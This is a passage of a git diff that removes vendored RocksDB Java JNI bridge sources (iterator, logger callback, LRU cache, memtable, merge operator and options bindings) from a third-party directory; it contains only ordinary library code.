-  return static_cast<jboolean>(options->allow_blocking_flush);
-}
-
-/*
- * Class:     org_rocksdb_IngestExternalFileOptions
- * Method:    setAllowBlockingFlush
- * Signature: (JZ)V
- */
-void Java_org_rocksdb_IngestExternalFileOptions_setAllowBlockingFlush(
-    JNIEnv* env, jobject jobj, jlong jhandle, jboolean jallow_blocking_flush) {
-  auto* options =
-      reinterpret_cast<rocksdb::IngestExternalFileOptions*>(jhandle);
-  options->allow_blocking_flush = static_cast<bool>(jallow_blocking_flush);
-}
-
-/*
- * Class:     org_rocksdb_IngestExternalFileOptions
- * Method:    disposeInternal
- * Signature: (J)V
- */
-void Java_org_rocksdb_IngestExternalFileOptions_disposeInternal(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  auto* options =
-      reinterpret_cast<rocksdb::IngestExternalFileOptions*>(jhandle);
-  delete options;
-}
\ No newline at end of file
diff --git a/thirdparty/rocksdb/java/rocksjni/iterator.cc b/thirdparty/rocksdb/java/rocksjni/iterator.cc
deleted file mode 100644
index 3ac9d50..0000000
--- a/thirdparty/rocksdb/java/rocksjni/iterator.cc
+++ /dev/null
@@ -1,158 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// This file implements the "bridge" between Java and C++ and enables
-// calling c++ rocksdb::Iterator methods from Java side.
-
-#include <stdio.h>
-#include <stdlib.h>
-#include <jni.h>
-
-#include "include/org_rocksdb_RocksIterator.h"
-#include "rocksjni/portal.h"
-#include "rocksdb/iterator.h"
-
-/*
- * Class:     org_rocksdb_RocksIterator
- * Method:    disposeInternal
- * Signature: (J)V
- */
-void Java_org_rocksdb_RocksIterator_disposeInternal(
-    JNIEnv* env, jobject jobj, jlong handle) {
-  auto* it = reinterpret_cast<rocksdb::Iterator*>(handle);
-  assert(it != nullptr);
-  delete it;
-}
-
-/*
- * Class:     org_rocksdb_RocksIterator
- * Method:    isValid0
- * Signature: (J)Z
- */
-jboolean Java_org_rocksdb_RocksIterator_isValid0(
-    JNIEnv* env, jobject jobj, jlong handle) {
-  return reinterpret_cast<rocksdb::Iterator*>(handle)->Valid();
-}
-
-/*
- * Class:     org_rocksdb_RocksIterator
- * Method:    seekToFirst0
- * Signature: (J)V
- */
-void Java_org_rocksdb_RocksIterator_seekToFirst0(
-    JNIEnv* env, jobject jobj, jlong handle) {
-  reinterpret_cast<rocksdb::Iterator*>(handle)->SeekToFirst();
-}
-
-/*
- * Class:     org_rocksdb_RocksIterator
- * Method:    seekToLast0
- * Signature: (J)V
- */
-void Java_org_rocksdb_RocksIterator_seekToLast0(
-    JNIEnv* env, jobject jobj, jlong handle) {
-  reinterpret_cast<rocksdb::Iterator*>(handle)->SeekToLast();
-}
-
-/*
- * Class:     org_rocksdb_RocksIterator
- * Method:    next0
- * Signature: (J)V
- */
-void Java_org_rocksdb_RocksIterator_next0(
-    JNIEnv* env, jobject jobj, jlong handle) {
-  reinterpret_cast<rocksdb::Iterator*>(handle)->Next();
-}
-
-/*
- * Class:     org_rocksdb_RocksIterator
- * Method:    prev0
- * Signature: (J)V
- */
-void Java_org_rocksdb_RocksIterator_prev0(
-    JNIEnv* env, jobject jobj, jlong handle) {
-  reinterpret_cast<rocksdb::Iterator*>(handle)->Prev();
-}
-
-/*
- * Class:     org_rocksdb_RocksIterator
- * Method:    seek0
- * Signature: (J[BI)V
- */
-void Java_org_rocksdb_RocksIterator_seek0(
-    JNIEnv* env, jobject jobj, jlong handle,
-    jbyteArray jtarget, jint jtarget_len) {
-  jbyte* target = env->GetByteArrayElements(jtarget, nullptr);
-  if(target == nullptr) {
-    // exception thrown: OutOfMemoryError
-    return;
-  }
-
-  rocksdb::Slice target_slice(
-      reinterpret_cast<char*>(target), jtarget_len);
-
-  auto* it = reinterpret_cast<rocksdb::Iterator*>(handle);
-  it->Seek(target_slice);
-
-  env->ReleaseByteArrayElements(jtarget, target, JNI_ABORT);
-}
-
-/*
- * Class:     org_rocksdb_RocksIterator
- * Method:    status0
- * Signature: (J)V
- */
-void Java_org_rocksdb_RocksIterator_status0(
-    JNIEnv* env, jobject jobj, jlong handle) {
-  auto* it = reinterpret_cast<rocksdb::Iterator*>(handle);
-  rocksdb::Status s = it->status();
-
-  if (s.ok()) {
-    return;
-  }
-
-  rocksdb::RocksDBExceptionJni::ThrowNew(env, s);
-}
-
-/*
- * Class:     org_rocksdb_RocksIterator
- * Method:    key0
- * Signature: (J)[B
- */
-jbyteArray Java_org_rocksdb_RocksIterator_key0(
-    JNIEnv* env, jobject jobj, jlong handle) {
-  auto* it = reinterpret_cast<rocksdb::Iterator*>(handle);
-  rocksdb::Slice key_slice = it->key();
-
-  jbyteArray jkey = env->NewByteArray(static_cast<jsize>(key_slice.size()));
-  if(jkey == nullptr) {
-    // exception thrown: OutOfMemoryError
-    return nullptr;
-  }
-  env->SetByteArrayRegion(jkey, 0, static_cast<jsize>(key_slice.size()),
-                          const_cast<jbyte*>(reinterpret_cast<const jbyte*>(key_slice.data())));
-  return jkey;
-}
-
-/*
- * Class:     org_rocksdb_RocksIterator
- * Method:    value0
- * Signature: (J)[B
- */
-jbyteArray Java_org_rocksdb_RocksIterator_value0(
-    JNIEnv* env, jobject jobj, jlong handle) {
-  auto* it = reinterpret_cast<rocksdb::Iterator*>(handle);
-  rocksdb::Slice value_slice = it->value();
-
-  jbyteArray jkeyValue =
-      env->NewByteArray(static_cast<jsize>(value_slice.size()));
-  if(jkeyValue == nullptr) {
-    // exception thrown: OutOfMemoryError
-    return nullptr;
-  }
-  env->SetByteArrayRegion(jkeyValue, 0, static_cast<jsize>(value_slice.size()),
-                          const_cast<jbyte*>(reinterpret_cast<const jbyte*>(value_slice.data())));
-  return jkeyValue;
-}
diff --git a/thirdparty/rocksdb/java/rocksjni/loggerjnicallback.cc b/thirdparty/rocksdb/java/rocksjni/loggerjnicallback.cc
deleted file mode 100644
index 09140ed..0000000
--- a/thirdparty/rocksdb/java/rocksjni/loggerjnicallback.cc
+++ /dev/null
@@ -1,313 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// This file implements the callback "bridge" between Java and C++ for
-// rocksdb::Logger.
-
-#include "include/org_rocksdb_Logger.h"
-
-#include "rocksjni/loggerjnicallback.h"
-#include "rocksjni/portal.h"
-#include <cstdarg>
-#include <cstdio>
-
-namespace rocksdb {
-
-LoggerJniCallback::LoggerJniCallback(
-    JNIEnv* env, jobject jlogger) {
-  // Note: Logger methods may be accessed by multiple threads,
-  // so we ref the jvm not the env
-  const jint rs = env->GetJavaVM(&m_jvm);
-  if(rs != JNI_OK) {
-    // exception thrown
-    return;
-  }
-
-  // Note: we want to access the Java Logger instance
-  // across multiple method calls, so we create a global ref
-  assert(jlogger != nullptr);
-  m_jLogger = env->NewGlobalRef(jlogger);
-  if(m_jLogger == nullptr) {
-    // exception thrown: OutOfMemoryError
-    return;
-  }
-  m_jLogMethodId = LoggerJni::getLogMethodId(env);
-  if(m_jLogMethodId == nullptr) {
-    // exception thrown: NoSuchMethodException or OutOfMemoryError
-    return;
-  }
-
-  jobject jdebug_level = InfoLogLevelJni::DEBUG_LEVEL(env);
-  if(jdebug_level == nullptr) {
-    // exception thrown: NoSuchFieldError, ExceptionInInitializerError
-    // or OutOfMemoryError
-    return;
-  }
-  m_jdebug_level = env->NewGlobalRef(jdebug_level);
-  if(m_jdebug_level == nullptr) {
-    // exception thrown: OutOfMemoryError
-    return;
-  }
-
-  jobject jinfo_level = InfoLogLevelJni::INFO_LEVEL(env);
-  if(jinfo_level == nullptr) {
-    // exception thrown: NoSuchFieldError, ExceptionInInitializerError
-    // or OutOfMemoryError
-    return;
-  }
-  m_jinfo_level = env->NewGlobalRef(jinfo_level);
-  if(m_jinfo_level == nullptr) {
-    // exception thrown: OutOfMemoryError
-    return;
-  }
-
-  jobject jwarn_level = InfoLogLevelJni::WARN_LEVEL(env);
-  if(jwarn_level == nullptr) {
-    // exception thrown: NoSuchFieldError, ExceptionInInitializerError
-    // or OutOfMemoryError
-    return;
-  }
-  m_jwarn_level = env->NewGlobalRef(jwarn_level);
-  if(m_jwarn_level == nullptr) {
-    // exception thrown: OutOfMemoryError
-    return;
-  }
-
-  jobject jerror_level = InfoLogLevelJni::ERROR_LEVEL(env);
-  if(jerror_level == nullptr) {
-    // exception thrown: NoSuchFieldError, ExceptionInInitializerError
-    // or OutOfMemoryError
-    return;
-  }
-  m_jerror_level = env->NewGlobalRef(jerror_level);
-  if(m_jerror_level == nullptr) {
-    // exception thrown: OutOfMemoryError
-    return;
-  }
-
-  jobject jfatal_level = InfoLogLevelJni::FATAL_LEVEL(env);
-  if(jfatal_level == nullptr) {
-    // exception thrown: NoSuchFieldError, ExceptionInInitializerError
-    // or OutOfMemoryError
-    return;
-  }
-  m_jfatal_level = env->NewGlobalRef(jfatal_level);
-  if(m_jfatal_level == nullptr) {
-    // exception thrown: OutOfMemoryError
-    return;
-  }
-
-  jobject jheader_level = InfoLogLevelJni::HEADER_LEVEL(env);
-  if(jheader_level == nullptr) {
-    // exception thrown: NoSuchFieldError, ExceptionInInitializerError
-    // or OutOfMemoryError
-    return;
-  }
-  m_jheader_level = env->NewGlobalRef(jheader_level);
-  if(m_jheader_level == nullptr) {
-    // exception thrown: OutOfMemoryError
-    return;
-  }
-}
-
-void LoggerJniCallback::Logv(const char* format, va_list ap) {
-  // We implement this method because it is virtual but we don't
-  // use it because we need to know about the log level.
-}
-
-void LoggerJniCallback::Logv(const InfoLogLevel log_level,
-    const char* format, va_list ap) {
-  if (GetInfoLogLevel() <= log_level) {
-
-    // determine InfoLogLevel java enum instance
-    jobject jlog_level;
-    switch (log_level) {
-      case rocksdb::InfoLogLevel::DEBUG_LEVEL:
-        jlog_level = m_jdebug_level;
-        break;
-      case rocksdb::InfoLogLevel::INFO_LEVEL:
-        jlog_level = m_jinfo_level;
-        break;
-      case rocksdb::InfoLogLevel::WARN_LEVEL:
-        jlog_level = m_jwarn_level;
-        break;
-      case rocksdb::InfoLogLevel::ERROR_LEVEL:
-        jlog_level = m_jerror_level;
-        break;
-      case rocksdb::InfoLogLevel::FATAL_LEVEL:
-        jlog_level = m_jfatal_level;
-        break;
-      case rocksdb::InfoLogLevel::HEADER_LEVEL:
-        jlog_level = m_jheader_level;
-        break;
-      default:
-        jlog_level = m_jfatal_level;
-        break;
-    }
-
-    assert(format != nullptr);
-    assert(ap != nullptr);
-    const std::unique_ptr<char[]> msg = format_str(format, ap);
-
-    // pass msg to java callback handler
-    jboolean attached_thread = JNI_FALSE;
-    JNIEnv* env = JniUtil::getJniEnv(m_jvm, &attached_thread);
-    assert(env != nullptr);
-
-    jstring jmsg = env->NewStringUTF(msg.get());
-    if(jmsg == nullptr) {
-      // unable to construct string
-      if(env->ExceptionCheck()) {
-        env->ExceptionDescribe(); // print out exception to stderr
-      }
-      JniUtil::releaseJniEnv(m_jvm, attached_thread);
-      return;
-    }
-    if(env->ExceptionCheck()) {
-      // exception thrown: OutOfMemoryError
-      env->ExceptionDescribe(); // print out exception to stderr
-      env->DeleteLocalRef(jmsg);
-      JniUtil::releaseJniEnv(m_jvm, attached_thread);
-      return;
-    }
-
-    env->CallVoidMethod(m_jLogger, m_jLogMethodId, jlog_level, jmsg);
-    if(env->ExceptionCheck()) {
-      // exception thrown
-      env->ExceptionDescribe(); // print out exception to stderr
-      env->DeleteLocalRef(jmsg);
-      JniUtil::releaseJniEnv(m_jvm, attached_thread);
-      return;
-    }
-
-    env->DeleteLocalRef(jmsg);
-    JniUtil::releaseJniEnv(m_jvm, attached_thread);
-  }
-}
-
-std::unique_ptr<char[]> LoggerJniCallback::format_str(const char* format, va_list ap) const {
-  va_list ap_copy;
-
-  va_copy(ap_copy, ap);
-  const size_t required = vsnprintf(nullptr, 0, format, ap_copy) + 1; // Extra space for '\0'
-  va_end(ap_copy);
-
-  std::unique_ptr<char[]> buf(new char[required]);
-
-  va_copy(ap_copy, ap);
-  vsnprintf(buf.get(), required, format, ap_copy);
-  va_end(ap_copy);
-
-  return buf;
-}
-
-LoggerJniCallback::~LoggerJniCallback() {
-  jboolean attached_thread = JNI_FALSE;
-  JNIEnv* env = JniUtil::getJniEnv(m_jvm, &attached_thread);
-  assert(env != nullptr);
-
-  if(m_jLogger != nullptr) {
-    env->DeleteGlobalRef(m_jLogger);
-  }
-
-  if(m_jdebug_level != nullptr) {
-    env->DeleteGlobalRef(m_jdebug_level);
-  }
-
-  if(m_jinfo_level != nullptr) {
-    env->DeleteGlobalRef(m_jinfo_level);
-  }
-
-  if(m_jwarn_level != nullptr) {
-    env->DeleteGlobalRef(m_jwarn_level);
-  }
-
-  if(m_jerror_level != nullptr) {
-    env->DeleteGlobalRef(m_jerror_level);
-  }
-
-  if(m_jfatal_level != nullptr) {
-    env->DeleteGlobalRef(m_jfatal_level);
-  }
-
-  if(m_jheader_level != nullptr) {
-    env->DeleteGlobalRef(m_jheader_level);
-  }
-
-  JniUtil::releaseJniEnv(m_jvm, attached_thread);
-}
-
-}  // namespace rocksdb
-
-/*
- * Class:     org_rocksdb_Logger
- * Method:    createNewLoggerOptions
- * Signature: (J)J
- */
-jlong Java_org_rocksdb_Logger_createNewLoggerOptions(
-    JNIEnv* env, jobject jobj, jlong joptions) {
-  auto* sptr_logger = new std::shared_ptr<rocksdb::LoggerJniCallback>(
-      new rocksdb::LoggerJniCallback(env, jobj));
-
-  // set log level
-  auto* options = reinterpret_cast<rocksdb::Options*>(joptions);
-  sptr_logger->get()->SetInfoLogLevel(options->info_log_level);
-
-  return reinterpret_cast<jlong>(sptr_logger);
-}
-
-/*
- * Class:     org_rocksdb_Logger
- * Method:    createNewLoggerDbOptions
- * Signature: (J)J
- */
-jlong Java_org_rocksdb_Logger_createNewLoggerDbOptions(
-    JNIEnv* env, jobject jobj, jlong jdb_options) {
-  auto* sptr_logger = new std::shared_ptr<rocksdb::LoggerJniCallback>(
-    new rocksdb::LoggerJniCallback(env, jobj));
-
-  // set log level
-  auto* db_options = reinterpret_cast<rocksdb::DBOptions*>(jdb_options);
-  sptr_logger->get()->SetInfoLogLevel(db_options->info_log_level);
-
-  return reinterpret_cast<jlong>(sptr_logger);
-}
-
-/*
- * Class:     org_rocksdb_Logger
- * Method:    setInfoLogLevel
- * Signature: (JB)V
- */
-void Java_org_rocksdb_Logger_setInfoLogLevel(
-    JNIEnv* env, jobject jobj, jlong jhandle, jbyte jlog_level) {
-  auto* handle =
-      reinterpret_cast<std::shared_ptr<rocksdb::LoggerJniCallback> *>(jhandle);
-  handle->get()->
-      SetInfoLogLevel(static_cast<rocksdb::InfoLogLevel>(jlog_level));
-}
-
-/*
- * Class:     org_rocksdb_Logger
- * Method:    infoLogLevel
- * Signature: (J)B
- */
-jbyte Java_org_rocksdb_Logger_infoLogLevel(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  auto* handle =
-      reinterpret_cast<std::shared_ptr<rocksdb::LoggerJniCallback> *>(jhandle);
-  return static_cast<jbyte>(handle->get()->GetInfoLogLevel());
-}
-
-/*
- * Class:     org_rocksdb_Logger
- * Method:    disposeInternal
- * Signature: (J)V
- */
-void Java_org_rocksdb_Logger_disposeInternal(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  auto* handle =
-      reinterpret_cast<std::shared_ptr<rocksdb::LoggerJniCallback> *>(jhandle);
-  delete handle;  // delete std::shared_ptr
-}
diff --git a/thirdparty/rocksdb/java/rocksjni/loggerjnicallback.h b/thirdparty/rocksdb/java/rocksjni/loggerjnicallback.h
deleted file mode 100644
index 2db8597..0000000
--- a/thirdparty/rocksdb/java/rocksjni/loggerjnicallback.h
+++ /dev/null
@@ -1,50 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// This file implements the callback "bridge" between Java and C++ for
-// rocksdb::Logger
-
-#ifndef JAVA_ROCKSJNI_LOGGERJNICALLBACK_H_
-#define JAVA_ROCKSJNI_LOGGERJNICALLBACK_H_
-
-#include <jni.h>
-#include <memory>
-#include <string>
-#include "port/port.h"
-#include "rocksdb/env.h"
-
-namespace rocksdb {
-
-  class LoggerJniCallback : public Logger {
-   public:
-     LoggerJniCallback(JNIEnv* env, jobject jLogger);
-     virtual ~LoggerJniCallback();
-
-     using Logger::SetInfoLogLevel;
-     using Logger::GetInfoLogLevel;
-     // Write an entry to the log file with the specified format.
-     virtual void Logv(const char* format, va_list ap);
-     // Write an entry to the log file with the specified log level
-     // and format.  Any log with level under the internal log level
-     // of *this (see @SetInfoLogLevel and @GetInfoLogLevel) will not be
-     // printed.
-     virtual void Logv(const InfoLogLevel log_level,
-         const char* format, va_list ap);
-
-   private:
-     JavaVM* m_jvm;
-     jobject m_jLogger;
-     jmethodID m_jLogMethodId;
-     jobject m_jdebug_level;
-     jobject m_jinfo_level;
-     jobject m_jwarn_level;
-     jobject m_jerror_level;
-     jobject m_jfatal_level;
-     jobject m_jheader_level;
-     std::unique_ptr<char[]> format_str(const char* format, va_list ap) const;
-  };
-}  // namespace rocksdb
-
-#endif  // JAVA_ROCKSJNI_LOGGERJNICALLBACK_H_
diff --git a/thirdparty/rocksdb/java/rocksjni/lru_cache.cc b/thirdparty/rocksdb/java/rocksjni/lru_cache.cc
deleted file mode 100644
index 1658268..0000000
--- a/thirdparty/rocksdb/java/rocksjni/lru_cache.cc
+++ /dev/null
@@ -1,41 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// This file implements the "bridge" between Java and C++ for
-// rocksdb::LRUCache.
-
-#include <jni.h>
-
-#include "cache/lru_cache.h"
-#include "include/org_rocksdb_LRUCache.h"
-
-/*
- * Class:     org_rocksdb_LRUCache
- * Method:    newLRUCache
- * Signature: (JIZD)J
- */
-jlong Java_org_rocksdb_LRUCache_newLRUCache(
-    JNIEnv* env, jclass jcls, jlong jcapacity, jint jnum_shard_bits,
-    jboolean jstrict_capacity_limit, jdouble jhigh_pri_pool_ratio) {
-  auto* sptr_lru_cache =
-      new std::shared_ptr<rocksdb::Cache>(rocksdb::NewLRUCache(
-          static_cast<size_t>(jcapacity),
-          static_cast<int>(jnum_shard_bits),
-          static_cast<bool>(jstrict_capacity_limit),
-          static_cast<double>(jhigh_pri_pool_ratio)));
-  return reinterpret_cast<jlong>(sptr_lru_cache);
-}
-
-/*
- * Class:     org_rocksdb_LRUCache
- * Method:    disposeInternal
- * Signature: (J)V
- */
-void Java_org_rocksdb_LRUCache_disposeInternal(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  auto* sptr_lru_cache =
-      reinterpret_cast<std::shared_ptr<rocksdb::Cache> *>(jhandle);
-  delete sptr_lru_cache;  // delete std::shared_ptr
-}
diff --git a/thirdparty/rocksdb/java/rocksjni/memtablejni.cc b/thirdparty/rocksdb/java/rocksjni/memtablejni.cc
deleted file mode 100644
index 56a04f9..0000000
--- a/thirdparty/rocksdb/java/rocksjni/memtablejni.cc
+++ /dev/null
@@ -1,90 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// This file implements the "bridge" between Java and C++ for MemTables.
-
-#include "rocksjni/portal.h"
-#include "include/org_rocksdb_HashSkipListMemTableConfig.h"
-#include "include/org_rocksdb_HashLinkedListMemTableConfig.h"
-#include "include/org_rocksdb_VectorMemTableConfig.h"
-#include "include/org_rocksdb_SkipListMemTableConfig.h"
-#include "rocksdb/memtablerep.h"
-
-/*
- * Class:     org_rocksdb_HashSkipListMemTableConfig
- * Method:    newMemTableFactoryHandle
- * Signature: (JII)J
- */
-jlong Java_org_rocksdb_HashSkipListMemTableConfig_newMemTableFactoryHandle(
-    JNIEnv* env, jobject jobj, jlong jbucket_count,
-    jint jheight, jint jbranching_factor) {
-  rocksdb::Status s = rocksdb::check_if_jlong_fits_size_t(jbucket_count);
-  if (s.ok()) {
-    return reinterpret_cast<jlong>(rocksdb::NewHashSkipListRepFactory(
-        static_cast<size_t>(jbucket_count),
-        static_cast<int32_t>(jheight),
-        static_cast<int32_t>(jbranching_factor)));
-  }
-  rocksdb::IllegalArgumentExceptionJni::ThrowNew(env, s);
-  return 0;
-}
-
-/*
- * Class:     org_rocksdb_HashLinkedListMemTableConfig
- * Method:    newMemTableFactoryHandle
- * Signature: (JJIZI)J
- */
-jlong Java_org_rocksdb_HashLinkedListMemTableConfig_newMemTableFactoryHandle(
-    JNIEnv* env, jobject jobj, jlong jbucket_count, jlong jhuge_page_tlb_size,
-    jint jbucket_entries_logging_threshold,
-    jboolean jif_log_bucket_dist_when_flash, jint jthreshold_use_skiplist) {
-  rocksdb::Status statusBucketCount =
-      rocksdb::check_if_jlong_fits_size_t(jbucket_count);
-  rocksdb::Status statusHugePageTlb =
-      rocksdb::check_if_jlong_fits_size_t(jhuge_page_tlb_size);
-  if (statusBucketCount.ok() && statusHugePageTlb.ok()) {
-    return reinterpret_cast<jlong>(rocksdb::NewHashLinkListRepFactory(
-        static_cast<size_t>(jbucket_count),
-        static_cast<size_t>(jhuge_page_tlb_size),
-        static_cast<int32_t>(jbucket_entries_logging_threshold),
-        static_cast<bool>(jif_log_bucket_dist_when_flash),
-        static_cast<int32_t>(jthreshold_use_skiplist)));
-  }
-  rocksdb::IllegalArgumentExceptionJni::ThrowNew(env,
-      !statusBucketCount.ok()?statusBucketCount:statusHugePageTlb);
-  return 0;
-}
-
-/*
- * Class:     org_rocksdb_VectorMemTableConfig
- * Method:    newMemTableFactoryHandle
- * Signature: (J)J
- */
-jlong Java_org_rocksdb_VectorMemTableConfig_newMemTableFactoryHandle(
-    JNIEnv* env, jobject jobj, jlong jreserved_size) {
-  rocksdb::Status s = rocksdb::check_if_jlong_fits_size_t(jreserved_size);
-  if (s.ok()) {
-    return reinterpret_cast<jlong>(new rocksdb::VectorRepFactory(
-        static_cast<size_t>(jreserved_size)));
-  }
-  rocksdb::IllegalArgumentExceptionJni::ThrowNew(env, s);
-  return 0;
-}
-
-/*
- * Class:     org_rocksdb_SkipListMemTableConfig
- * Method:    newMemTableFactoryHandle0
- * Signature: (J)J
- */
-jlong Java_org_rocksdb_SkipListMemTableConfig_newMemTableFactoryHandle0(
-    JNIEnv* env, jobject jobj, jlong jlookahead) {
-  rocksdb::Status s = rocksdb::check_if_jlong_fits_size_t(jlookahead);
-  if (s.ok()) {
-    return reinterpret_cast<jlong>(new rocksdb::SkipListFactory(
-        static_cast<size_t>(jlookahead)));
-  }
-  rocksdb::IllegalArgumentExceptionJni::ThrowNew(env, s);
-  return 0;
-}
diff --git a/thirdparty/rocksdb/java/rocksjni/merge_operator.cc b/thirdparty/rocksdb/java/rocksjni/merge_operator.cc
deleted file mode 100644
index 1b94382..0000000
--- a/thirdparty/rocksdb/java/rocksjni/merge_operator.cc
+++ /dev/null
@@ -1,48 +0,0 @@
-// Copyright (c) 2014, Vlad Balan (vlad.gm@gmail.com).  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// This file implements the "bridge" between Java and C++
-// for rocksdb::MergeOperator.
-
-#include <stdio.h>
-#include <stdlib.h>
-#include <jni.h>
-#include <string>
-#include <memory>
-
-#include "include/org_rocksdb_StringAppendOperator.h"
-#include "rocksjni/portal.h"
-#include "rocksdb/db.h"
-#include "rocksdb/options.h"
-#include "rocksdb/statistics.h"
-#include "rocksdb/memtablerep.h"
-#include "rocksdb/table.h"
-#include "rocksdb/slice_transform.h"
-#include "rocksdb/merge_operator.h"
-#include "utilities/merge_operators.h"
-
-/*
- * Class:     org_rocksdb_StringAppendOperator
- * Method:    newSharedStringAppendOperator
- * Signature: ()J
- */
-jlong Java_org_rocksdb_StringAppendOperator_newSharedStringAppendOperator
-(JNIEnv* env, jclass jclazz) {
-  auto* sptr_string_append_op = new std::shared_ptr<rocksdb::MergeOperator>(
-    rocksdb::MergeOperators::CreateFromStringId("stringappend"));
-  return reinterpret_cast<jlong>(sptr_string_append_op);
-}
-
-/*
- * Class:     org_rocksdb_StringAppendOperator
- * Method:    disposeInternal
- * Signature: (J)V
- */
-void Java_org_rocksdb_StringAppendOperator_disposeInternal(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  auto* sptr_string_append_op =
-      reinterpret_cast<std::shared_ptr<rocksdb::MergeOperator>* >(jhandle);
-  delete sptr_string_append_op;  // delete std::shared_ptr
-}
diff --git a/thirdparty/rocksdb/java/rocksjni/options.cc b/thirdparty/rocksdb/java/rocksjni/options.cc
deleted file mode 100644
index 8194aba..0000000
--- a/thirdparty/rocksdb/java/rocksjni/options.cc
+++ /dev/null
@@ -1,6101 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// This file implements the "bridge" between Java and C++ for rocksdb::Options.
-
-#include <stdio.h>
-#include <stdlib.h>
-#include <jni.h>
-#include <memory>
-#include <vector>
-
-#include "include/org_rocksdb_Options.h"
-#include "include/org_rocksdb_DBOptions.h"
-#include "include/org_rocksdb_ColumnFamilyOptions.h"
-#include "include/org_rocksdb_WriteOptions.h"
-#include "include/org_rocksdb_ReadOptions.h"
-#include "include/org_rocksdb_ComparatorOptions.h"
-#include "include/org_rocksdb_FlushOptions.h"
-
-#include "rocksjni/comparatorjnicallback.h"
-#include "rocksjni/portal.h"
-#include "rocksjni/statisticsjni.h"
-
-#include "rocksdb/db.h"
-#include "rocksdb/options.h"
-#include "rocksdb/statistics.h"
-#include "rocksdb/memtablerep.h"
-#include "rocksdb/table.h"
-#include "rocksdb/slice_transform.h"
-#include "rocksdb/rate_limiter.h"
-#include "rocksdb/comparator.h"
-#include "rocksdb/convenience.h"
-#include "rocksdb/merge_operator.h"
-#include "utilities/merge_operators.h"
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    newOptions
- * Signature: ()J
- */
-jlong Java_org_rocksdb_Options_newOptions__(JNIEnv* env, jclass jcls) {
-  auto* op = new rocksdb::Options();
-  return reinterpret_cast<jlong>(op);
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    newOptions
- * Signature: (JJ)J
- */
-jlong Java_org_rocksdb_Options_newOptions__JJ(JNIEnv* env, jclass jcls,
-    jlong jdboptions, jlong jcfoptions) {
-  auto* dbOpt = reinterpret_cast<const rocksdb::DBOptions*>(jdboptions);
-  auto* cfOpt = reinterpret_cast<const rocksdb::ColumnFamilyOptions*>(
-      jcfoptions);
-  auto* op = new rocksdb::Options(*dbOpt, *cfOpt);
-  return reinterpret_cast<jlong>(op);
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    disposeInternal
- * Signature: (J)V
- */
-void Java_org_rocksdb_Options_disposeInternal(
-    JNIEnv* env, jobject jobj, jlong handle) {
-  auto* op = reinterpret_cast<rocksdb::Options*>(handle);
-  assert(op != nullptr);
-  delete op;
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    setIncreaseParallelism
- * Signature: (JI)V
- */
-void Java_org_rocksdb_Options_setIncreaseParallelism(
-    JNIEnv * env, jobject jobj, jlong jhandle, jint totalThreads) {
-  reinterpret_cast<rocksdb::Options*>
-      (jhandle)->IncreaseParallelism(static_cast<int>(totalThreads));
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    setCreateIfMissing
- * Signature: (JZ)V
- */
-void Java_org_rocksdb_Options_setCreateIfMissing(
-    JNIEnv* env, jobject jobj, jlong jhandle, jboolean flag) {
-  reinterpret_cast<rocksdb::Options*>(jhandle)->create_if_missing = flag;
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    createIfMissing
- * Signature: (J)Z
- */
-jboolean Java_org_rocksdb_Options_createIfMissing(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  return reinterpret_cast<rocksdb::Options*>(jhandle)->create_if_missing;
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    setCreateMissingColumnFamilies
- * Signature: (JZ)V
- */
-void Java_org_rocksdb_Options_setCreateMissingColumnFamilies(
-    JNIEnv* env, jobject jobj, jlong jhandle, jboolean flag) {
-  reinterpret_cast<rocksdb::Options*>
-      (jhandle)->create_missing_column_families = flag;
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    createMissingColumnFamilies
- * Signature: (J)Z
- */
-jboolean Java_org_rocksdb_Options_createMissingColumnFamilies(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  return reinterpret_cast<rocksdb::Options*>
-      (jhandle)->create_missing_column_families;
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    setComparatorHandle
- * Signature: (JI)V
- */
-void Java_org_rocksdb_Options_setComparatorHandle__JI(
-    JNIEnv* env, jobject jobj, jlong jhandle, jint builtinComparator) {
-  switch (builtinComparator) {
-    case 1:
-      reinterpret_cast<rocksdb::Options*>(jhandle)->comparator =
-          rocksdb::ReverseBytewiseComparator();
-      break;
-    default:
